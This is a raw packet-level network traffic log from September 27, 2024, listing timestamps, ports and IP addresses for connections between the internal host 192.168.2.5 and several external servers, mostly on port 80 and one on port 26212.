Sep 27, 2024 04:21:15.109813929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.109838963 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.109853983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.109935999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.109961033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.109985113 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.110016108 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.110392094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.110411882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.110431910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.110445023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.110456944 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.110472918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.110488892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.110542059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.165389061 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:15.170310974 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:15.174258947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.174315929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.176492929 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:15.215770960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.215785027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.215795994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.215837955 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.215879917 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.228086948 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228158951 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.228223085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228256941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228290081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228312016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.228344917 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.228517056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228548050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228579998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228600979 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.228626966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.228868961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228900909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.228924990 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.228943110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.228974104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.229006052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.229026079 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.229051113 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.229624987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.229655981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.229684114 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.229718924 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.229732990 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.229763031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.229787111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.229819059 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.229860067 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.229918957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.230037928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230068922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230089903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.230110884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.230159998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230190992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230256081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.230279922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230312109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230331898 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.230357885 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.230384111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230427980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230443001 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.230473995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230508089 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.230528116 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.230556965 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.231080055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.231111050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.231134892 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.231153011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.231189966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.231240988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.231681108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.231735945 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.231786966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.232297897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.232328892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.232362032 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.232382059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.232413054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.232444048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.232466936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.232492924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.232520103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.232568979 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.232971907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.233022928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.233053923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.233074903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.233103991 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.233129025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.233165979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.233215094 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.233253002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.233300924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.265291929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.265302896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.265345097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.265358925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.269310951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269341946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269356012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269386053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.269386053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.269457102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269468069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269474030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.269479990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269490957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269507885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269550085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.269550085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.269551039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269562006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.269618988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.269756079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.274327993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.274339914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.274420977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.281759977 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.281835079 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.283607006 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.288417101 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.305172920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.305186033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.305247068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.334884882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.334916115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.334984064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.335007906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.335027933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.335061073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.335097075 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.335114002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.335133076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.335164070 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.335186958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.335381031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347376108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347434044 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347451925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347475052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347485065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347496033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347501993 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347507954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347523928 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347558975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347718000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347767115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347794056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347807884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347826958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347837925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347841978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347851992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347861052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347892046 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.347944021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347955942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.347994089 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.348438978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348481894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348490000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.348495007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348524094 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.348543882 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.348568916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348583937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348593950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348604918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348643064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.348665953 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.348673105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348684072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.348706961 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.348733902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.349334955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349349976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349360943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349368095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349387884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.349410057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.349631071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349651098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349663019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349680901 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.349716902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.349746943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349759102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349769115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349781990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349796057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.349813938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.349884987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349895954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349906921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.349935055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.349947929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.350610018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350630999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350644112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350657940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.350672960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.350692034 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.350717068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350728035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350739002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350749969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350763083 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.350788116 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.350795984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350806952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350843906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.350862026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.350907087 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.351593018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351603985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351614952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351644993 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.351667881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351670027 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.351680994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351691961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351710081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.351726055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.351794004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351804972 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351815939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351825953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.351851940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.351864100 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.352520943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352533102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352544069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352570057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.352586031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.352596045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352607965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352654934 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.352654934 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.352690935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352704048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352715015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352725983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352737904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.352739096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.352766991 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.352786064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.353398085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.353408098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.353452921 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.353461981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.355741978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.355753899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.355763912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.355798960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.355823994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.365015030 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:15.369247913 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:15.374066114 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:15.393661022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.393676043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.393687010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.393743992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.393909931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.393920898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.393978119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.393994093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394006014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394022942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394041061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.394067049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.394067049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.394516945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394527912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394540071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394581079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.394581079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.394602060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394613981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394625902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.394669056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.394669056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.395469904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.395482063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.395493031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.395556927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.395567894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.395580053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.395581007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.395620108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.395620108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.395644903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.395657063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.395667076 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.395692110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.395714998 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.396393061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.396430969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.396471977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.396471977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.398655891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.398756027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.425359964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425373077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425384998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425445080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425457001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425466061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425478935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425482035 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.425489902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425543070 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.425594091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425605059 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425622940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425632000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.425649881 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.425676107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.437722921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.437742949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.437799931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.437833071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.437844992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.437855005 CEST	80	49724	176.113.115.95	192.168.2.5
